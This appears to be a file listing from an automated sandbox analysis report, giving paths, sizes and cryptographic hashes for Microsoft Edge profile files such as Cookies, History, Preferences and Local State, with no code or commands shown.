C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\8ac2260bfd1e95cb_0

Filesize
255B

MD5
a5eedaa77ac93a09a6a4d7422c15196d

SHA1
e075e7188f18b9ff084aaa0686badb01752f6a6f

SHA256
98b7d9d14dbe7e994d74dedf6544c1b5c88488611f082128fac65b461962ba45

SHA512
54d5d4ed57b37042c1e5e92d22f5a4006b795c0f812efa59e07d0f747cc2bca64bf088c279e91f9dc2fbada4b1c010d19056a3a31ed4e4198dc739af02226949

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\bed58bda5e518895_0

Filesize
205B

MD5
5cebe98dce6a6553efd11c8df454cfc0

SHA1
4f5b1a8786167b19cffc009201faf48f10eae4ea

SHA256
6e606ac311e3311511d1e1e27b2e86d5f56ee6f5b98bb4857960fe3add0546fe

SHA512
d3ad54d8a3fc7deb46ef531d9d42ad31c197ec58178ed55792909f1cff72b39117024c3e1c0ff55cce7c2c81ba158765fad5e827be384b21785a9e2c62d416ec

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
168B

MD5
7505c38a117bb2cba75889b3f37304f8

SHA1
910d0c6dc1e6773a506fc1e1708365df041c0098

SHA256
c14e3fdd8049a9c4daffc3b31e9a8694db5a688f38d8a2073f7beeebe0be8637

SHA512
6f00ecbf27d62bf5fba103aff8258ff1bdd4051631bcfcdf278299b03fa0ee944e5618347d996a7b8e3e233d90714bbbb4b6567361bb679ebac1216f014ba822

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
168B

MD5
3952c2a53ff6caeeb3e43298a34b6d15

SHA1
bcc8c0c7bd4508c64f87356e3bdfbdd0a5d7cf19

SHA256
5383abe5cfdb41d265fe6bea2b0e1f9570f847a36f77cdcce91cbaaa28b1498e

SHA512
e25cddb4ac5de6692d539e36493d2a1f8e3a0f5631bca982d1fdd73b7a2595e5f36497658ed927ec10a16b495437b81e415e364b4425f9afa4a516433887bc30

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
168B

MD5
9f2e2764920fb9413d4f015384c256f8

SHA1
ffa747bd01cbeed6bfff4517467262371ab6c198

SHA256
d761619b4d9bba9c7b6ec61346552e1a900d116ed46efd26a5b745064b4ab414

SHA512
a053d28e5107fecfc6542561a579374b60034b4c2b83c2c26d03988ce794d0511b3cdcde22ed516149098a9f311b52bbfdec13a8a3879d3e880b6137c7b4ce99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
168B

MD5
76508fda102564c2950169160c357e62

SHA1
174ba97503f364f3c5f2d64a8238c90dc9b81134

SHA256
2cf696add311cc7ec4668a861295e2a4b340b4a12d3d50d0a89ada86b0a6f551

SHA512
949a253fcc435dcd5e079058c6167966ec1722b4661abca9228ba865116e476e9b4ba102d0bcdbfaadc770a7766080f161bd3bad829837fa45d85a866f93f70c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
168B

MD5
69cbcf823cbe95344f02a435782db032

SHA1
b4810fd08167023f157ae22fa06a2408e0d53743

SHA256
686aaced218591cafa757b49b57abd16e5a5f242167fb9d5f931a40406c54306

SHA512
44eea1e394fb0e59de758cbf5f938816a5f396926659f0d0ab6b2e62cdd574c532b8a228fa593dd5f9f327c14e0dd7325ea5e199d26b9ef67dcb0a645a125372

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies

Filesize
20KB

MD5
7af3b0c204c9c128da35edcc1d558015

SHA1
b6aad94bfdf9a75690b53e3727f262bdb6661360

SHA256
8ea7a3c53ad1684a864453fc360b5852842be2c0f868d1a4303f1172b3ef675b

SHA512
a4d4c38269c2a1d3d313d4add8bda9a83d6a8b8af16a4938655176682d34044847682055aeb9db77eacf69ce03ff2d428f4563cd673a4902cbee9bdd9bcfa820

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies-journal

Filesize
12KB

MD5
f1b71eb512946ab623f1873d0a486289

SHA1
8c2fdd0657ed569b4b121fff196483e7ce2820a7

SHA256
0c183099b26ca3c26e7df2167b481541d92b53851ee3c0b62bd99c97d1c17ac9

SHA512
649c0129899755746d34fc9fbd3f189cebddee447a28040e72c2f1bd404d6b19cd840d092436fe617af9502fd4f0c43a86b6ea436dcfb6edad226550383e45c5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Filesize
319B

MD5
4340139c857682ea7afa059837365000

SHA1
22c06a559cbde26bf298012f237e123113640329

SHA256
6a94953fe3fb1e650e1056896a2cdccf07f3d1b3eaa915287bf788eb07a6b7a3

SHA512
2e7e96001d794f242fe9ac08614ea373817663fa99022f96df26d6828b7590d2d910045a98a221159c031759ee488c121d7fce3b5c3729e4c98ca138c496c54e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Favicons

Filesize
20KB

MD5
1bbc4fdcb037ba707ce677a63c91c8bc

SHA1
f3a0d79dfd08d7d978ff5cb37558000f6c46a791

SHA256
6e62f96e80bb8ab28ae048b38c12aa830e55cd151fee6fe1e61572b9ebeb0cba

SHA512
1c4da08c66926c276fbe92be642773d9685607bcfa7f6d345b3a176d555365e462335f6e5747e2c45c40689f3d494601c40812044144382758d8edb002b77e29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History

Filesize
124KB

MD5
203b5370c2ae4fae7812b5ddc5f10ca3

SHA1
39fee108564859fd0ccef5026d5e27e929de7cc5

SHA256
04ef50ddb52b91b95c790f9b41d3aca2404a8e9a96495510a6bd781428cb9ab5

SHA512
4440ca016f363af4c2902b208fa2a4a725ab3db594cc5cc53eebd5f1807aee1127b16500beac629a4f34c37fe07b2facb61a2ce74e8f81aa764f1ea12a64464d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History Provider Cache

Filesize
596B

MD5
18205dc5c9e4a412a71deee2f8c93995

SHA1
89600b6040221e0ab7c8a95c63e5eb9b312aaf36

SHA256
d4d1f7e17dc5931b51c9cfdf6c0b6bb528c1dade14313677135c4ee23be71388

SHA512
a9097dfe038bbf66d4dd3e0ba2466ef0d58b8137f45be852f6636b321836bf7bed0c4faeffb0cbecaadd3e2a1b63fa1462cf4f2fb40b65f5e9ae78193fac12d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Filesize
20KB

MD5
c7b46c9733f601ed4f8b6f3147ffae1e

SHA1
501d2ff837edaf6f1770554dc5fa3c68cd71f51b

SHA256
8cdc266c7183452faa76a3062878b95c5568622afdb6ee16641edb3a5c448079

SHA512
ae92a9d9540e537d3ebddfd7266f7b34bd9bb3f470cee3e34eaf0082a19faf5cba3cde2b1befd2b99d2a691e8287d25781ff93a478d76007105a1f94032d5a25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Filesize
110B

MD5
a7b239e839e09da565d8bfb9c9e1ea59

SHA1
86f4782c040f97e8799677a09f5ac0cc9d84354d

SHA256
ea8900a45c83e2432e449ee690e806d7c6ce5cda7d7caa411a3a061c50e3833d

SHA512
006867db7ae88f70cefe9094430beca6b9841af6423d2954625373a3c5ec63f1be8192a6c4e9737ec6dcecc5076d85defc368fd76858e8feda4881e36c23d998

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Filesize
331B

MD5
d66e6fa08177d1eb9cdfbefeba24d7f1

SHA1
caabdc2c4a7171d77edb972a664579d55302a753

SHA256
d5e0fadde44996d8cb6c9111ca6a97f86af8228c536f04fed03acb7c60c1f5ce

SHA512
906a064960c9951558d78bd149b602958b25edec64e228eb63f9a6ce8d03de7d6bb26ea72cf94514169de2e9e5cce749f1ddca68c22cef1ef675e77b5e3ec219

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
265B

MD5
6459608f24d7bc0a8f1b7a5159b1f1ef

SHA1
266ef550998ca6309c182a3d234b868526bb46a0

SHA256
71cb9f0a6040fa656022488893ef4de24363fef03f467127b4d8479eda530144

SHA512
52aa68b61a5038a56f80f0054eecac284bbadfa05054a20029b050ac59babad858fc9f8eb2a36edde8250f4ad6dc3350667c85c381447832d12ab1fc9d6a6990

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
474B

MD5
9b7c8ab26e2a4416b46373720fdcbdfa

SHA1
dd80b4ef67bc0e46adc984ff60f1ec106b4fd14e

SHA256
2fe03471bb91add4c77a6e670fd319732c0775c082916e3ebcf4660f93f64417

SHA512
4c5f0ae31dced160ef05f4bea1567c0ff051631a0c10d32e9b65b9710049ccbb1e1b6ecd9f0ae747fdd6af11398c342806ed963ec0d7106ce81289d208871bd0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
383B

MD5
01c5bf833f387cb289938174f2eef6b6

SHA1
b6dbe9ef57307961be013c04f343ea043c60de71

SHA256
6d932d0751f4fd4abb14ee1673b229029a9c15f5a07ce3ca78536480ad40b23e

SHA512
26c62106fda7d55f61750f001aedaf3a46fb60891cea135ec46d28dc24857c823cefcb27694b40a1c446d3ea054efc2088a8987d4fd1759e3ecb5660ac1b49cd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
414B

MD5
061dfab38cb6c8a4bac5a143e93bed0f

SHA1
67b7b9eb8c066a246f73f6dfa779ebba96435354

SHA256
4fa196d13656b353937b2a5f51ed7ec879989a744dac37d81b11c8533668f5ac

SHA512
47c917e9f276ac7e76d1a729492cae3a988acf6b4d1c442eb2eabb58d14c4fdb295bf219e6791e79b2df97fc0d8fd12c3ba7b68a14991d3bc3ce05f4214e7714

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
474B

MD5
21c7e8af623612b58019c90173050bc2

SHA1
221fadc625290fdda54c91fd720210ef413102df

SHA256
33e19a5708520e680f29ac053d58cc338da61c2550f4fcebc12d78cb66de3084

SHA512
b24b55c07e54b704e3d37af534eee8b885d3cb07447c0ba6aecc5017f077c7529e5d4c31089d4cf5f46fbedffbbb6d62871ba688972e09560798ec06b61ab7d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e128cb72271b17a6cc0d6399600b6566

SHA1
08c869f63b8f24a0f889d21d523f1be87ff728ca

SHA256
d6ca8c5e4f2e921559f1c0f00b368f73ebca61a0123b06d1f78b0f3d785c88e6

SHA512
58df15a57cb8d7a0bdd5b5d8db5fa007951b126fc5bc9f64ead56ea6b95c16919bfe97e9df8320f9f554c59c520b86a2367e547098dee3e6140ebbc7329b1cab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e075191529cd800939d6bbf73ed7c288

SHA1
f03f61347212581144bc37f27a5afe83dca53156

SHA256
533d086be577c8a5dc21839697f22805af075dabddc887bf9aac0b2fbf581f41

SHA512
f3ec25dba25eeb7ffbb0c0ce173b20261a154706745738806300914616d4ce2a22c2d41eb8b131d0552da9b846a5b37d9b76734370c7e3109227ba29b1ca86ce

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
54174d4a5cdd5d9cb4165fb074defe38

SHA1
911a9d0e3cff9b4f2d7cda356437c497568e1039

SHA256
6c38065f9892ca1b898897a913bf32834707a1d955616b153c4e77a86dd03ca3

SHA512
b695b392f817b2339eaadd5e1182125d62728942502ec5db6bd56b5d38bcb600281687830e7213e3aa42284a6d98d44da36ae4973ed5a0f3af8e387e31be5789

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
bd3c58b85478206ed8f89b6b6debe2ea

SHA1
b8933b30f104d8ee7a0552e757b0bf442ef33a0c

SHA256
65fc2294fed00025765eb2253593e496c2fced5b41f40fd83d0519ffaeb3057e

SHA512
0e66dbd77bb0bd493bbf87027666dd00c0c154c0861bd2d66c8e003fc46d2cca8a6b676794395fcdf1572f8294ad93da5ef6b25460fe05e77f3abe3b6d5626fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
dee44d5da44161244cd3c8794a3359ad

SHA1
88fe5be0da18507e14d5a6b56e8e4c3a31b5a3e8

SHA256
b56d9dc490e3ecca6d18311264c242e9e2efecaa00ae2d11b45b7aacee5b128a

SHA512
c1014bf526278a590b47c376a863b712e44a2a1863493f7add0bd05271ddc8d5340b3245b9724196e660cbf54ddb593514344057f60a514ab8d0cd190fe86018

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
7ac437369f15903043c1d8f8551a854d

SHA1
bf3bbe30657d465c3bf46b79eaba079fc83c4e31

SHA256
76d25cb4e3159d6d7ae6dee6a0cad1df002dec8d975708e453712b5f3614d525

SHA512
7977a06cd78b692fd19aa1767da75bb30290eeb6d053dd4d1ba64c1ffa0b71460e1bebd2d4b69e8e26e95d25cf3c5ff0fb0e86c784b23a2083c8add7ec273d8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
3e672e7dc5f917df8e4b35a47ba2b050

SHA1
b3874a54e6cee59934bb2360dd38bd277dff30c5

SHA256
a59ba7cae9343e9b0c9ad264db372871aa866a17a4144c0dc606b526da224bf7

SHA512
69761fa22c41a6d7f712f5357b1593244ecf9f517e4d9461e4b0edbf4aebc00487e382a591a8c116eed6a2fe51154b7dfd07b5a036914bf033274a82a2b936f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
ab3137e529ac8ea99875b2da0fc69b87

SHA1
a2832ca666f23a14ff90d3dbeb6df8c48785000f

SHA256
0713cfea3ee36da87a5a940b18f002b17e6febdf084dcb06b1df0fb7e24d21f6

SHA512
559a28864e8f2a6df29c9b792e1fb982d3a0eafecc10bf452fa2a7c48c216fcaa8047bf5a18cea1101e576dd6af710987cd189afdc251f34574fae52f7b37fe9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e6b565f6023cf0e06d5d86582766af81

SHA1
c3a16c87ce9930c2b8718581c19774a3624cc9cc

SHA256
c78aec52644d995997b6cbe541d4972d953397945426f6858b445ab44e86d882

SHA512
19ce3aa49f2e3ace2839e116a7b74673b4b51bb3cb06fd77999dc7e5724751c35aefd2b86039bd8148e920a9f974b231f2e727c2ed3b8fe490a9a7dedbe34303

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
94d3388c6eed8a7d1d7a0cc24501504f

SHA1
c742f4fbfeedd1889c48049046a4806cb9376207

SHA256
f1ae2461f559bf43f0e1ba48dfe12691803ed9855995928eeab0a398c75aafb9

SHA512
a5ffc130f3526b01287c314dcc2bf09760aaa1b8e8afdd3c2e5d7b605ab60ac5ad48013e1006a432327bdc28f77f8a4525b639bc452b44460d94735d62cc91eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Filesize
309B

MD5
947f5bb6c453a67ab6df83e2147cc894

SHA1
b4ba8b6f6432a1c32e9dd75b5b7d102c734da96e

SHA256
a509d566d303b4f481805440dc0b890e94b5a30672d41394faab3df22917f32b

SHA512
b0d48c3a3c68a9c4e91560729ebcec568bf831aace7a330a94f513400815213d375e2639772a883e7bc9a2cbbc911b5d3126f7f153c8e7fb0f4010345cf6a751

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Filesize
319B

MD5
17546fee23e6fea7927ed36487b65465

SHA1
09e847113ddf47065915e8b6bcd6d5e470c2a004

SHA256
4b71721754a9b051d369b8d926d765c7ae1be4481c674c2104077070e2c6f370

SHA512
a63ed774e4239140bdbe97052e3c143dc3ce77920f9983f214fe3df374943c6602fee83dfd8da3d0d2824f18c2bba8a5e9ae0c2dfdbf33570d07c08352ee8a7a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13364160268333935

Filesize
2KB

MD5
54fe52caafbdd17b42004f04d94f85a3

SHA1
f1dd0e242c72480119d66804aa13c73300eee541

SHA256
faa1c90dcb7fab2066a4fa07264e6fd066fd820b8f1bb448462b40f6a6371c88

SHA512
aa1cb0c9779be43436505378671791cd9b2ad9f88952d7fc33d4f1ef52a04271549f3dc1ba9d5eccfc9673486e857986df830654d61c05f90af00f8953795cbc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Tabs_13364160268539935

Filesize
2KB

MD5
5cada29edd277eb62702d680fbc34196

SHA1
a22743f8cd95f2021c3c1014a490a6df81fd568d

SHA256
2f0b994d4d106a1bce6c4fd74b8b376452dc5ebe9cdcc317ef6947da6de7ade6

SHA512
46ff3542abe965a0b2d6cf975cee7b2c6ab253124b3497bec5a14739ff587034f0f867e03b524df28a77b41925808e407c4c0568e4b2eaca8cb6a26c75fb8aaf

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Filesize
347B

MD5
993731a6d70fc297bcea032cc4f6ba92

SHA1
137f3d0eccd47405be17d9373ef5f0b8520a2fa7

SHA256
1ac5132f3eb3ac2dacb143ead485b3ff3a204123d146950c62dcbf39f3c2538f

SHA512
b5db74b91974984a4578887560ea95d6d6cd55040168e13653ef76e68931d9bad1e91b3a60a1fa268365e2513dd0cd7be8b75edcd28af4fc12cf769c912f67f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

Filesize
323B

MD5
80ddc66c81bb637199809df96d0211ab

SHA1
0cb60c65dfcfe441658706f728bfb5f407abf914

SHA256
b4e0cab94af0d5e60ddcdd936a46e24fa91f4dad0e9b608cf5ce5dff2c7b4a16

SHA512
9275cf675ceb0ff73a2098d24f3daaf4c20c5d3a18e857405c2de2c442a529d7eff1d4ed69de1746a84bba444863889bcbeb95c7a8357b5a28fc7a24bdb751d9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
204B

MD5
183a87db603809219215c5ada969e5ce

SHA1
980e1004686c2f276439fc7ea7e8b27f77381f1f

SHA256
4f8991d054943e0ff749c1885d61d7a0f74b034f2ae5adf22fbbc2d028a684ff

SHA512
1e08a47d386b70cc515c7beac7b18661e9adacf54d644d7ffb1ec7f025d21921c9e79f18fdb8bee106c94833cdf601173a7afcbe048d818a01b6549d72a961e7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Visited Links

Filesize
128KB

MD5
3a103ff2d98f3b631bde706bc8dfce15

SHA1
afb1e2a94996d8aadabf176cb49dcd271fb32ac5

SHA256
d10ac1dd7ddacd46a3e2c7a383e2f0d0d5f34e00ce0597d807ecc28d30c7a20b

SHA512
43a7f877865027224ce92816f767d4cc2df077a968a54a28aebcde2afeb731cfff034033e9cf71b87d6c98f443466364e7c250586cfc0960ce0fb0c35b0380c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\WebAssistDatabase

Filesize
10KB

MD5
947d8eeb594309787fc34d7872edac29

SHA1
2ed049dcb2387e9c64d340623eb9b41c7241df8e

SHA256
08b9078846ca60942f31fba9aee539fa45f5fdf5f56f6e5b08d680602de9075e

SHA512
aba0b3c34733bc76e03826a5b8c6902af6c95932533a9429aaf786ebecfcdd8d918c690a8853f9fd0e4de5155e953561fed9842a2649ec87eb58f61d67804e54

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

Filesize
44KB

MD5
6df9e3d3bcc8c3e30bafcb6065de8409

SHA1
d3a547aad70e1518a57ccf737645eee0efbe5650

SHA256
6d96aae6d7a905a498fa5f5f4b1ffcbb091c3e9c9a8507942cfcc54e5d89af71

SHA512
60e208f52bca9970e856172f173d0a933850f7745692a047014fff9716d62402a158b11d175071adcbe5aa5e5e5858241e923c64bc422b2a94c0662784469032

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\load_statistics.db

Filesize
44KB

MD5
11514e9ae6bcb9f25c5b11a69692b9e5

SHA1
f6d1d9c69bb12a17cad0c7dff308ff346148a257

SHA256
9c23ac6f1a01dd5b08a1af3bf0837888c9a8d326cf23285c8acbc41710dc7ce4

SHA512
9de1b5ab31b6272c0e800d087cdfe9e43984dc847dcf0ccf15bc4efb0bb8b7763bd636addce7279a119e7de7bc6caee85ad44ee499cc4eadf92642be7701778c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\LOG

Filesize
322B

MD5
27d644768a023feec90a27f6e8d0e192

SHA1
04991c1c4622a256aa640c95897c609e46b2b425

SHA256
665a29416c66f4b502e25e81ad3ba765888f39cee814fe0f5a25fab518f929b7

SHA512
6e117095583aa800f81f94fbee4e713a5d2705303bbd6b8334c13bdc3809afec518ece645a0fae2e862aaceedc30d5945ed47eac7c5ac3b69ecc43de0c92752a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\000003.log

Filesize
194B

MD5
a48763b50473dbd0a0922258703d673e

SHA1
5a3572629bcdf5586d79823b6ddbf3d9736aa251

SHA256
9bb14ea03c24f4c3543b22a8b4e9d306b926d4950cfcc410808ecac2407409fd

SHA512
536406435e35f8204ce6d3b64850ffb656813aacbc5172af895c16c4f183005d69999c4f48f948875d9837890f290b51a7358ff974fb1efc6ba3d1592426cca1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG

Filesize
340B

MD5
f4a0ad136a1d3da661e2065f0596688f

SHA1
00ea93797a41210202763b3738e844911be58d33

SHA256
271605de539e6dbf9efdcb3703dab8682d022d88b189247570f56c48484ac69b

SHA512
bb9d4b444bce4a2ba59dfbbed516b65bb2a44c5ced1970f4afd0c3c9f9f5238bef35a7bfa04d3e2c4eb12d65c3fd0102b8c622a136bf0d2dd1635ca18174fb6a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

Filesize
44KB

MD5
ec1d9589d66698598bd39fa5b932b957

SHA1
b1face518627b212506537f42082f55b26671ede

SHA256
6c5259d833c2d9518043dc268cadae18f41625962f340a7afa1eee89a3e0c375

SHA512
8cee14b31d91eb04b713006f5adef7a8b8257106051c587522669e81d90a248dc44e3630dbe3063fbe2f2d23d9221b6497f322f7091ce0f9bb6469d30f0d0bb1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_0

Filesize
44KB

MD5
aaca89a11a954aa3dc2aa21ab98c5485

SHA1
3a955aaabeee4df2d552c67e51de59205190cc92

SHA256
2f5e06d559507257575e6a0594f7e3fe681910eec23801f4e411f88db399b2ed

SHA512
abf7292a7ec14b4756fe77a80dcbe0020db278c983b72b48f8052de63751c5878e0fafef30eab29770392410bdc63d2c768990eb11259901d4b30881fadfe2c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

Filesize
264KB

MD5
db6ba7220e38b1ba48d2d00da4548d30

SHA1
6db2e2ccc13e075d222cc2a1cc73753c6a1fc087

SHA256
d0a451b61ffc619a60e4a17b6ba4bcdc677bcd3dab5851eee328b34680a414c0

SHA512
a207134c0734d56dacac3b18aa037e483e6c1910fd56d8cdc084fb7f59dd3a7706f4d3425b28601f41c5938c28b6a7a90e770b877d0c4d8de697e0f20f6987ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1

Filesize
264KB

MD5
e135d8559e41934d898d89aa5b60a130

SHA1
5a6c4e8d297acc8c682cdbb7723a29ac7059c544

SHA256
8943848e3842d99cbf1665055d19774c536ebebebf660cbc41f22b89ef32f8d2

SHA512
66a73ec422acf25d68a5d6219f20a9e8f6903189d6522e7543e83ef936732171faa4f9b9f037c7855ae59794da3eac6572dd01870be771f8c13e9d6100d9d264

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_3

Filesize
4.0MB

MD5
5dedaa0a32c38d917d3c3cb9f035d06f

SHA1
b3f184a32951c7afb584c32d973488b781581b9b

SHA256
53c4567acd914eddaa3952cbd84a47ac5aa4a23ae960c1db3a3b17a6fac14c2a

SHA512
23a495a5fa30e08781e666a097595b8903cfdc2d88a9e9895db8ba8781cfaa7706a30d05cca3e76d09c13fecdd39840d98eb010e89ca54f70bd7bd0e328b2bd4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
918e96dd6f54b8a25333f05ded39f833

SHA1
f69cf2080202cb91ade023f241eb03fba1c487ac

SHA256
fb725c11ea1e59c511dc78b4e775d7a41b2e8ac317a1d170cbd5991c05f55b41

SHA512
e5040f3933557b177f203fca1565c64c3eb8aeab1fe6fc2865fa1dd9d3a31c4545fd7a0fb90a12e2e82118a827a2c564113c40480f75fa2acdee3b9e578dfac5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
caa8b7fdb956ed0daf8c2df26f247e03

SHA1
7d04ecbc4715a6edcbfe739f1d972640a0c5aca4

SHA256
7957b7cc3b2d198751e150ffc2fe45590aed3a5f932e1362f7aa814a3dfc9c16

SHA512
cc6666e30eaa10c056d8702bf56600c64c0d68da921420f84de924291cadb62657748a42fdb192fca588e6a11400e9256bd2c8531aea24280ccad0f9b9f40f11

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
c7c455660a7947cd50c843fbce913145

SHA1
7dca3bf5a820518a775dc2f61fbb64c90c241f53

SHA256
bf7270408eae419e771c14c31b374ec549606637025921db334e42a436ffce62

SHA512
5318e13d4e4b0e6bb956f53a63729e3cb2e585143714e370aaa3c56a3e08738da4cec87f27a4887d511eeb0315af5ada1ebee8d64038b77166f87f933049bba3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
a8ee4e705f7dbb8b0693f6e15089cc7d

SHA1
1b5fdf54827dcf610599039716a60b641217b982

SHA256
3c265bd17a0d6d70224909f92d86d0b70d59af72ff2b035fac9de79a3c3e8e1a

SHA512
c6215b21e37677e36c703762a3868b498016630fb83df11a63bf23e560d4c2a6bb7d718f83b8bac2e382c64a70660121810c0e56b9e00ff0a4dcf85c8c7a5cd0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
3aff09b24cf728ee868b445eb0cb88da

SHA1
4d1b7b7da671e8bdb36cbb5b6e0b3c6c1fb4031d

SHA256
6c959a754f5067a952f07863f2b35145863e0639c21feb53d7918355a6a3401a

SHA512
c205cc76d4e86d3b869889871e02ab2ddeace94c88c0ef751c5d3fd9c618de77dc3338a217370e301612c3da509a4ea170c3b3da3268943920151417c76cd376

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
40c56057a7da75a990bffd22c232636f

SHA1
3645e589c685c1cd6387da661229bde5367dec48

SHA256
bf597bd3a17e57458499cb125bce2c16f7da3875abc5b25fdd6bc2efc4c16a70

SHA512
12450af4620d6df808b9c50c4d938fc53949905fd949b7e46099a8d9497d1892b360f5626070beb23b3bce6342f7dc96e326baff768c566a0aa5c6783063b580

Download Submit
